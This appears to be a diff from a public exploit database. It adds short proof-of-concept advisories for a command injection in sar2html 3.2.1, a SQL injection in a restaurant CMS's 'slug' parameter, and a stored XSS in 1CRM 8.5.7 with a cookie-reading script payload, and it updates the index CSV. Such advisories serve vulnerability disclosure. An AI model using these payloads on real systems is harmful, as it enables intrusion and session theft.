DB: 2019-08-03

3 changes to exploits/shellcodes

Ultimate Loan Manager 2.0 - Cross-Site Scripting
WebIncorp ERP - SQL injection
Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery
Ultimate Loan Manager 2.0 - Cross-Site Scripting
WebIncorp ERP - SQL injection
Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery
Sar2HTML 3.2.1 - Remote Command Execution
Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection
1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting

exploits/php/webapps/47204.txt

@@ -0,0 +1,13 @@
+# Exploit Title: sar2html Remote Code Execution
+# Date: 01/08/2019
+# Exploit Author: Furkan KAYAPINAR
+# Vendor Homepage:https://github.com/cemtan/sar2html 
+# Software Link: https://sourceforge.net/projects/sar2html/
+# Version: 3.2.1
+# Tested on: Centos 7
+
+In web application you will see index.php?plot url extension.
+
+http://<ipaddr>/index.php?plot=;<command-here> will execute 
+the command you entered. After command injection press "select # host" then your command's 
+output will appear bottom side of the scroll screen.

exploits/php/webapps/47205.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Rest - Cafe and Restaurant Website CMS - SQL Injection
+# Date: 1.8.2019.
+# Exploit Author: n1x_ [MS-WEB]
+# Vendor Homepage: https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154
+# CWE : CWE-89
+
+Vulnerable parameter: slug (news.php)
+
+[GET Request]
+
+GET //host/[path]/news.php?slug=x' HTTP/1.1
+Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US
+Cache-Control: max-age=0
+Cookie: PHPSESSID=87e839a144a7c326454406dea88b92bc
+Host: host
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362

exploits/php/webapps/47206.txt

@@ -0,0 +1,99 @@
+******************************************************************
+*                  1CRM On-Premise Software 8.5.7                *
+*                           Stored XSS                           *
+******************************************************************
+
+
+////////////////////////////////////////////////////////////////////////////////////
+
+# Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting
+# Date: 19/07/2019
+# Exploit Author: Kusol Watchara-Apanukorn
+# Vendor Homepage: https://1crm.com/
+# Version: 8.5.7 <=
+# Tested on: CentOS 7.6.1810 (Core)
+# CVE : CVE-2019-14221
+////////////////////////////////////////////////////////////////////////////////////
+
+
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+1CRM On-Premise Software 8.5.7 allows XSS via a payload that is
+mishandled during a Run Report operation.  ///
+
+//////////////////////////////////////////////////////////////////////////////////////////////////////////////
+
+
+Vulnerability Description:
+
+XSS flaws occur whenever an application includes untrusted data in a
+new web page without proper validation or escaping, or updates an
+existing web page with user supplied data using a browser API that can
+create JavaScript. XSS allows attackers to execute scripts in the
+victim’s browser which can hijack user sessions, deface web sites, or
+redirect the user to malicious sites.
+
+
+########################################################################################################################
+Attack Narratives and Scenarios:
+                                                #
+
+                                                #
+**Attacker**
+                                                #
+1. Login as any user
+                                                #
+2. Click Email icon
+                                                #
+3. Click Report
+                                                #
+4. Click Create Report
+                                                #
+5. Fill Report Name (In our case we fill Company B)
+                                                #
+6. Assign to Victim (In our case we assigned to admin)
+                                                #
+7. Click Column Layout
+                                                #
+8. Click Add empty column
+                                                #
+9. Input malicious code (In our case:
+<script>alert(document.cookie);</script>)
+          #
+10. Click Save
+                                                #
+
+                                                #
+**Victim**
+                                                #
+1. Click email icon
+                                                #
+2. Click Report
+                                                #
+3. Choose report that we recently created (In our case we choose
+Company B)                                            #
+4. Click Run Report
+                                                #
+5. Admin cookie will popup
+                                                #
+########################################################################################################################
+
+PoC
+
+-----------------------------------------
+
+Github: https://github.com/cccaaasser/1CRM-CVE/blob/master/CVE-2019-14221.md
+
+
+Vulnerability Disclosure Timeline:
+==================================
+
+19 July, 19 : Found Vulnerability
+
+19 July, 19 : Vendor Notification
+
+24 July  19 : Vendor Response
+
+24 July  19 : Vendor Fixed
+
+31 July, 19 : Vendor released new patched version 8.5.10

files_exploits.csv

@@ -41569,6 +41569,9 @@ id,file,description,date,author,type,platform,port
 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
 47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,
 47196,exploits/multiple/webapps/47196.txt,"Oracle Hyperion Planning 11.1.2.3 - XML External Entity",2019-07-31,"Lucas Dinucci",webapps,multiple,
-47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,
+47198,exploits/multiple/webapps/47198.txt,"Ultimate Loan Manager 2.0 - Cross-Site Scripting",2019-08-01,"Metin Yunus Kandemir",webapps,multiple,80
-47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,
+47199,exploits/php/webapps/47199.txt,"WebIncorp ERP - SQL injection",2019-08-01,n1x_,webapps,php,80
-47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware,
+47203,exploits/hardware/webapps/47203.html,"Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery",2019-08-01,"Alperen Soydan",webapps,hardware,80
+47204,exploits/php/webapps/47204.txt,"Sar2HTML 3.2.1 - Remote Command Execution",2019-08-02,"Cemal Cihad ÇİFTÇİ",webapps,php,80
+47205,exploits/php/webapps/47205.txt,"Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection",2019-08-02,n1x_,webapps,php,80
+47206,exploits/php/webapps/47206.txt,"1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting",2019-08-02,"Kusol Watchara-Apanukorn",webapps,php,80